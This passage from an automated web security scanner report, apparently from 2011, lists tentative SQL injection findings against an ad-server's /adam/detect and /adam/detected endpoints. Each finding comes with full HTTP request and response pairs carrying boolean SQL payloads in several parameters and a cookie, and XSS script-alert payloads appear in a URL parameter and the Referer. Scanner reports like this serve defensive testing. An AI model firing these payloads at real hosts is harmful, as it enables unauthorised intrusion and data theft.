Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228210170/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087&HEIGHT=87021414440%20or%201%3d2--%20&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:45 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=orL6Y9wx3NQ0caacbSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:04 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228210170/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.6. http://hfm.checkm8.com/adam/detect [WIDTH parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The WIDTH parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the WIDTH parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087%20and%201%3d1--%20&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:42 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wCJ38Sv9UJ7MTba;Path=/;
Set-cookie: C=onL6Y9wx3NQ0caaYaSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:01 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228210170/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087%20and%201%3d2--%20&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:42 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=onL6Y9wx3NQ0caaZaSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:01 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228210170/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.7. http://hfm.checkm8.com/adam/detect [dt cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The dt cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the dt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692'%20and%201%3d1--%20; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:06 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wdH68Sv9UJ7MTba;Path=/;
Set-cookie: C=oML6Y9wx3NQ0caascSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228215787/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692'%20and%201%3d2--%20; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:06 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=oML6Y9wx3NQ0caatcSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228215787/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.8. http://hfm.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&1%20and%201%3d1--%20=1 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:15 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba;Path=/;
Set-cookie: C=oxY5Y9wQKLW1caaBdSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:34 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&1%20and%201%3d2--%20=1 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:15 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: C=oxY5Y9wQKLW1caaCdSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:35 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.9. http://hfm.checkm8.com/adam/detect [req parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The req parameter appears to be vulnerable to SQL injection attacks. The payloads 21397261'%20or%201%3d1--%20 and 21397261'%20or%201%3d2--%20 were each submitted in the req parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr21397261'%20or%201%3d1--%20&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:11 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba;Path=/;
Set-cookie: C=osY5Y9wQKLW1caa8cSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:30 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr21397261'%20or%201%3d2--%20&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:11 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: C=osY5Y9wQKLW1caa9cSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:30 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.10. http://hfm.checkm8.com/adam/detected [DATE parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The DATE parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the DATE parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917'%20and%201%3d1--%20&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:19 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba;Path=/;
Set-cookie: C=oYL6Y9wdWQQ0caaGdSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:38 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917'%20and%201%3d2--%20&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:19 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=oYL6Y9wdWQQ0caaHdSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:38 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.11. http://hfm.checkm8.com/adam/detected [FL parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The FL parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the FL parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&~=&OS=WIN7&FL=FL10'%20and%201%3d1--%20&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:49 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba;Path=/;
Set-cookie: C=o4Y5Y9wQKLW1caa0gSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:06:08 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&~=&OS=WIN7&FL=FL10'%20and%201%3d2--%20&JE=1&UL=en&RES=RS21 HTTP/1.1
